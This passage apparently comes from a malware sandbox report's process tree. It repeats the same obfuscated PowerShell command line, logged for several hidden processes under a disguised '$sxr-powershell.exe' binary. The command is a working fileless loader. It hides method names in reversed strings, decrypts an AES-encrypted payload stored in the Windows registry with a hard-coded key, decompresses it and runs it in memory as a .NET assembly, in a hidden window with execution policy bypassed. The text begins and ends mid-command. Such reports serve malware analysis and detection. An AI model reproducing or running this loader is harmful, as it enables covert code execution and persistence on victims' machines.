'')('6lRW0jGzlAA5nbkjHf5Tsi2VcY+e72Di8pyST+P3b+zKhEOatzOvsZwWc+tNvaenFYt371ubGqjG2iZNgW2Ruqyxtm0FlLj/6SFCvhVuHBoXGShbkjll0X0J0Yf8IrHI015qKEspAwvJ3BIkY31lE641I57ZA9mkxn3r2dmP9uXIIejGAbUYS/Egydi59SI4nLAn0KYi1PmCbY3T/4H6s6RDYRGM84TonfBl6Shh4V7e77iWS5OK+T93c6MxOusyAlznel1QyGuYsaEpfjJ3pZxnRDqxM+cJ6BV7z8XM6VlKLAriZV3af8+QPmGxYUFSetnhCdNepWVjla/rc+wznH76gqNjdrTdE4sXG2oefxeMo2RVY9GEE56HPY/MHqKXuj9QJ9R71SzOk/Jp6SI/aU6ftBcuLTHGK8ii/LzWWM4=');$BYhfv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($BYhfv, 0, $BYhfv.Length);$BYhfv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($BYhfv);$Rqbjy = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zLOMq/59oqNcdFMRuju6ng==');$Rqbjy = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Rqbjy, 0, $Rqbjy.Length);$Rqbjy = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($Rqbjy);$KASyv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('72lxeVY82PoJcJ3hbiQEIw==');$KASyv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($KASyv, 0, $KASyv.Length);$KASyv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($KASyv);$mknYJ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zVB7M6DhuDz9HVN22epYIw==');$mknYJ = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($mknYJ, 0, $mknYJ.Length);$mknYJ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($mknYJ);$CcpOW = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('HUIziUB7x4wdL9DXkS0rtA==');$CcpOW = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($CcpOW, 0, $CcpOW.Length);$CcpOW = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($CcpOW);$IVrwI = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('sTbvcUvEJoAxsnBrBeUD8g==');$IVrwI = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($IVrwI, 0, $IVrwI.Length);$IVrwI = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($IVrwI);$DEDSw0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Jlr5GUhwRFzfhvwaclrGQg==');$DEDSw0 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw0, 0, $DEDSw0.Length);$DEDSw0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw0);$DEDSw1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('VRv4nf1Tsuy8xOh1GOIbLw==');$DEDSw1 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw1, 0, $DEDSw1.Length);$DEDSw1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw1);$DEDSw2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('qoyKUlYeEofaQd2Nsn4c1Q==');$DEDSw2 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw2, 0, $DEDSw2.Length);$DEDSw2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw2);$DEDSw3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('x+L5SCITRwLaIySJMRKPcA==');$DEDSw3 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw3, 0, $DEDSw3.Length);$DEDSw3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw3);$zJtjN.Dispose();$IUziZ1.Dispose();$ZnTbq = [Microsoft.Win32.Registry]::$CcpOW.$mknYJ($DEDSw).$KASyv($jMYEl);$hYcHq = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($ZnTbq);$IUziZ = New-Object System.Security.Cryptography.AesManaged;$IUziZ.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$VYFAv = $IUziZ.('rotpyrceDetaerC'[-1..-15] -join '')();$hYcHq = $VYFAv.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($hYcHq, 0, $hYcHq.Length);$VYFAv.Dispose();$IUziZ.Dispose();$zInKm = New-Object System.IO.MemoryStream(, $hYcHq);$vncyw = New-Object System.IO.MemoryStream;$aIVco = New-Object System.IO.Compression.GZipStream($zInKm, [IO.Compression.CompressionMode]::$DEDSw1);$aIVco.$IVrwI($vncyw);$aIVco.Dispose();$zInKm.Dispose();$vncyw.Dispose();$hYcHq = $vncyw.ToArray();$zxNyE = $BYhfv | IEX;$OwixV = $zxNyE::$DEDSw2($hYcHq);$vhBKp = $OwixV.EntryPoint;$vhBKp.$DEDSw0($null, (, [string[]] ($XVbaw)))
        21⤵
        Hide Artifacts: Hidden Window
        
        PID:8944
        
        C:\Windows\$sxr-powershell.exe
        
        "C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(5228).WaitForExit();[System.Threading.Thread]::Sleep(5000); $IUziZ1 = New-Object System.Security.Cryptography.AesManaged;$IUziZ1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$zJtjN = $IUziZ1.('rotpyrceDetaerC'[-1..-15] -join '')();$DEDSw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('dNZQ79CdCcT3RZeJIBMeWA==');$DEDSw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw, 0, $DEDSw.Length);$DEDSw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw);$jMYEl = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ffs1oB2cg9MQou+VEQ8aDXxHbAIu//njEEr4yqOAe8c=');$jMYEl = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($jMYEl, 0, $jMYEl.Length);$jMYEl = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($jMYEl);$XVbaw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('GvpxgK9ah8YOSS3JRrNuog==');$XVbaw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($XVbaw, 0, $XVbaw.Length);$XVbaw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($XVbaw);$BYhfv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('6lRW0jGzlAA5nbkjHf5Tsi2VcY+e72Di8pyST+P3b+zKhEOatzOvsZwWc+tNvaenFYt371ubGqjG2iZNgW2Ruqyxtm0FlLj/6SFCvhVuHBoXGShbkjll0X0J0Yf8IrHI015qKEspAwvJ3BIkY31lE641I57ZA9mkxn3r2dmP9uXIIejGAbUYS/Egydi59SI4nLAn0KYi1PmCbY3T/4H6s6RDYRGM84TonfBl6Shh4V7e77iWS5OK+T93c6MxOusyAlznel1QyGuYsaEpfjJ3pZxnRDqxM+cJ6BV7z8XM6VlKLAriZV3af8+QPmGxYUFSetnhCdNepWVjla/rc+wznH76gqNjdrTdE4sXG2oefxeMo2RVY9GEE56HPY/MHqKXuj9QJ9R71SzOk/Jp6SI/aU6ftBcuLTHGK8ii/LzWWM4=');$BYhfv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($BYhfv, 0, $BYhfv.Length);$BYhfv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($BYhfv);$Rqbjy = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zLOMq/59oqNcdFMRuju6ng==');$Rqbjy = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Rqbjy, 0, $Rqbjy.Length);$Rqbjy = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($Rqbjy);$KASyv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('72lxeVY82PoJcJ3hbiQEIw==');$KASyv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($KASyv, 0, $KASyv.Length);$KASyv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($KASyv);$mknYJ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zVB7M6DhuDz9HVN22epYIw==');$mknYJ = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($mknYJ, 0, $mknYJ.Length);$mknYJ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($mknYJ);$CcpOW = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('HUIziUB7x4wdL9DXkS0rtA==');$CcpOW = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($CcpOW, 0, $CcpOW.Length);$CcpOW = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($CcpOW);$IVrwI = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('sTbvcUvEJoAxsnBrBeUD8g==');$IVrwI = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($IVrwI, 0, $IVrwI.Length);$IVrwI = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($IVrwI);$DEDSw0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Jlr5GUhwRFzfhvwaclrGQg==');$DEDSw0 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw0, 0, $DEDSw0.Length);$DEDSw0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw0);$DEDSw1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('VRv4nf1Tsuy8xOh1GOIbLw==');$DEDSw1 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw1, 0, $DEDSw1.Length);$DEDSw1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw1);$DEDSw2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('qoyKUlYeEofaQd2Nsn4c1Q==');$DEDSw2 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw2, 0, $DEDSw2.Length);$DEDSw2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw2);$DEDSw3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('x+L5SCITRwLaIySJMRKPcA==');$DEDSw3 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw3, 0, $DEDSw3.Length);$DEDSw3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw3);$zJtjN.Dispose();$IUziZ1.Dispose();$ZnTbq = [Microsoft.Win32.Registry]::$CcpOW.$mknYJ($DEDSw).$KASyv($jMYEl);$hYcHq = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($ZnTbq);$IUziZ = New-Object System.Security.Cryptography.AesManaged;$IUziZ.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$VYFAv = $IUziZ.('rotpyrceDetaerC'[-1..-15] -join '')();$hYcHq = $VYFAv.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($hYcHq, 0, $hYcHq.Length);$VYFAv.Dispose();$IUziZ.Dispose();$zInKm = New-Object System.IO.MemoryStream(, $hYcHq);$vncyw = New-Object System.IO.MemoryStream;$aIVco = New-Object System.IO.Compression.GZipStream($zInKm, [IO.Compression.CompressionMode]::$DEDSw1);$aIVco.$IVrwI($vncyw);$aIVco.Dispose();$zInKm.Dispose();$vncyw.Dispose();$hYcHq = $vncyw.ToArray();$zxNyE = $BYhfv | IEX;$OwixV = $zxNyE::$DEDSw2($hYcHq);$vhBKp = $OwixV.EntryPoint;$vhBKp.$DEDSw0($null, (, [string[]] ($XVbaw)))
        21⤵
        
        PID:9212
        
        C:\Windows\$sxr-powershell.exe
        
        "C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(5228).WaitForExit();[System.Threading.Thread]::Sleep(5000); $IUziZ1 = New-Object System.Security.Cryptography.AesManaged;$IUziZ1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$zJtjN = $IUziZ1.('rotpyrceDetaerC'[-1..-15] -join '')();$DEDSw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('dNZQ79CdCcT3RZeJIBMeWA==');$DEDSw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw, 0, $DEDSw.Length);$DEDSw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw);$jMYEl = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ffs1oB2cg9MQou+VEQ8aDXxHbAIu//njEEr4yqOAe8c=');$jMYEl = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($jMYEl, 0, $jMYEl.Length);$jMYEl = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($jMYEl);$XVbaw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('GvpxgK9ah8YOSS3JRrNuog==');$XVbaw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($XVbaw, 0, $XVbaw.Length);$XVbaw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($XVbaw);$BYhfv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('6lRW0jGzlAA5nbkjHf5Tsi2VcY+e72Di8pyST+P3b+zKhEOatzOvsZwWc+tNvaenFYt371ubGqjG2iZNgW2Ruqyxtm0FlLj/6SFCvhVuHBoXGShbkjll0X0J0Yf8IrHI015qKEspAwvJ3BIkY31lE641I57ZA9mkxn3r2dmP9uXIIejGAbUYS/Egydi59SI4nLAn0KYi1PmCbY3T/4H6s6RDYRGM84TonfBl6Shh4V7e77iWS5OK+T93c6MxOusyAlznel1QyGuYsaEpfjJ3pZxnRDqxM+cJ6BV7z8XM6VlKLAriZV3af8+QPmGxYUFSetnhCdNepWVjla/rc+wznH76gqNjdrTdE4sXG2oefxeMo2RVY9GEE56HPY/MHqKXuj9QJ9R71SzOk/Jp6SI/aU6ftBcuLTHGK8ii/LzWWM4=');$BYhfv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($BYhfv, 0, $BYhfv.Length);$BYhfv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($BYhfv);$Rqbjy = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zLOMq/59oqNcdFMRuju6ng==');$Rqbjy = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Rqbjy, 0, $Rqbjy.Length);$Rqbjy = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($Rqbjy);$KASyv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('72lxeVY82PoJcJ3hbiQEIw==');$KASyv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($KASyv, 0, $KASyv.Length);$KASyv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($KASyv);$mknYJ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zVB7M6DhuDz9HVN22epYIw==');$mknYJ = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($mknYJ, 0, $mknYJ.Length);$mknYJ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($mknYJ);$CcpOW = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('HUIziUB7x4wdL9DXkS0rtA==');$CcpOW = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($CcpOW, 0, $CcpOW.Length);$CcpOW = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($CcpOW);$IVrwI = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('sTbvcUvEJoAxsnBrBeUD8g==');$IVrwI = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($IVrwI, 0, $IVrwI.Length);$IVrwI = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($IVrwI);$DEDSw0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Jlr5GUhwRFzfhvwaclrGQg==');$DEDSw0 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw0, 0, $DEDSw0.Length);$DEDSw0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw0);$DEDSw1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('VRv4nf1Tsuy8xOh1GOIbLw==');$DEDSw1 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw1, 0, $DEDSw1.Length);$DEDSw1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw1);$DEDSw2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('qoyKUlYeEofaQd2Nsn4c1Q==');$DEDSw2 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw2, 0, $DEDSw2.Length);$DEDSw2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw2);$DEDSw3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('x+L5SCITRwLaIySJMRKPcA==');$DEDSw3 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw3, 0, $DEDSw3.Length);$DEDSw3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw3);$zJtjN.Dispose();$IUziZ1.Dispose();$ZnTbq = [Microsoft.Win32.Registry]::$CcpOW.$mknYJ($DEDSw).$KASyv($jMYEl);$hYcHq = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($ZnTbq);$IUziZ = New-Object System.Security.Cryptography.AesManaged;$IUziZ.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$VYFAv = $IUziZ.('rotpyrceDetaerC'[-1..-15] -join '')();$hYcHq = $VYFAv.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($hYcHq, 0, $hYcHq.Length);$VYFAv.Dispose();$IUziZ.Dispose();$zInKm = New-Object System.IO.MemoryStream(, $hYcHq);$vncyw = New-Object System.IO.MemoryStream;$aIVco = New-Object System.IO.Compression.GZipStream($zInKm, [IO.Compression.CompressionMode]::$DEDSw1);$aIVco.$IVrwI($vncyw);$aIVco.Dispose();$zInKm.Dispose();$vncyw.Dispose();$hYcHq = $vncyw.ToArray();$zxNyE = $BYhfv | IEX;$OwixV = $zxNyE::$DEDSw2($hYcHq);$vhBKp = $OwixV.EntryPoint;$vhBKp.$DEDSw0($null, (, [string[]] ($XVbaw)))
        21⤵
        
        PID:6168
        
        C:\Windows\$sxr-powershell.exe
        
        "C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(5228).WaitForExit();[System.Threading.Thread]::Sleep(5000); $IUziZ1 = New-Object System.Security.Cryptography.AesManaged;$IUziZ1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$zJtjN = $IUziZ1.('rotpyrceDetaerC'[-1..-15] -join '')();$DEDSw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('dNZQ79CdCcT3RZeJIBMeWA==');$DEDSw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw, 0, $DEDSw.Length);$DEDSw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw);$jMYEl = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ffs1oB2cg9MQou+VEQ8aDXxHbAIu//njEEr4yqOAe8c=');$jMYEl = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($jMYEl, 0, $jMYEl.Length);$jMYEl = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($jMYEl);$XVbaw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('GvpxgK9ah8YOSS3JRrNuog==');$XVbaw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($XVbaw, 0, $XVbaw.Length);$XVbaw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($XVbaw);$BYhfv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('6lRW0jGzlAA5nbkjHf5Tsi2VcY+e72Di8pyST+P3b+zKhEOatzOvsZwWc+tNvaenFYt371ubGqjG2iZNgW2Ruqyxtm0FlLj/6SFCvhVuHBoXGShbkjll0X0J0Yf8IrHI015qKEspAwvJ3BIkY31lE641I57ZA9mkxn3r2dmP9uXIIejGAbUYS/Egydi59SI4nLAn0KYi1PmCbY3T/4H6s6RDYRGM84TonfBl6Shh4V7e77iWS5OK+T93c6MxOusyAlznel1QyGuYsaEpfjJ3pZxnRDqxM+cJ6BV7z8XM6VlKLAriZV3af8+QPmGxYUFSetnhCdNepWVjla/rc+wznH76gqNjdrTdE4sXG2oefxeMo2RVY9GEE56HPY/MHqKXuj9QJ9R71SzOk/Jp6SI/aU6ftBcuLTHGK8ii/LzWWM4=');$BYhfv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($BYhfv, 0, $BYhfv.Length);$BYhfv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($BYhfv);$Rqbjy = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zLOMq/59oqNcdFMRuju6ng==');$Rqbjy = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Rqbjy, 0, $Rqbjy.Length);$Rqbjy = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($Rqbjy);$KASyv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('72lxeVY82PoJcJ3hbiQEIw==');$KASyv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($KASyv, 0, $KASyv.Length);$KASyv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($KASyv);$mknYJ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zVB7M6DhuDz9HVN22epYIw==');$mknYJ = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($mknYJ, 0, $mknYJ.Length);$mknYJ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($mknYJ);$CcpOW = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('HUIziUB7x4wdL9DXkS0rtA==');$CcpOW = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($CcpOW, 0, $CcpOW.Length);$CcpOW = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($CcpOW);$IVrwI = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('sTbvcUvEJoAxsnBrBeUD8g==');$IVrwI = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($IVrwI, 0, $IVrwI.Length);$IVrwI = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($IVrwI);$DEDSw0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Jlr5GUhwRFzfhvwaclrGQg==');$DEDSw0 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw0, 0, $DEDSw0.Length);$DEDSw0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw0);$DEDSw1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('VRv4nf1Tsuy8xOh1GOIbLw==');$DEDSw1 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw1, 0, $DEDSw1.Length);$DEDSw1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw1);$DEDSw2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('qoyKUlYeEofaQd2Nsn4c1Q==');$DEDSw2 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw2, 0, $DEDSw2.Length);$DEDSw2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw2);$DEDSw3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('x+L5SCITRwLaIySJMRKPcA==');$DEDSw3 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw3, 0, $DEDSw3.Length);$DEDSw3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw3);$zJtjN.Dispose();$IUziZ1.Dispose();$ZnTbq = [Microsoft.Win32.Registry]::$CcpOW.$mknYJ($DEDSw).$KASyv($jMYEl);$hYcHq = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($ZnTbq);$IUziZ = New-Object System.Security.Cryptography.AesManaged;$IUziZ.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ.IV = 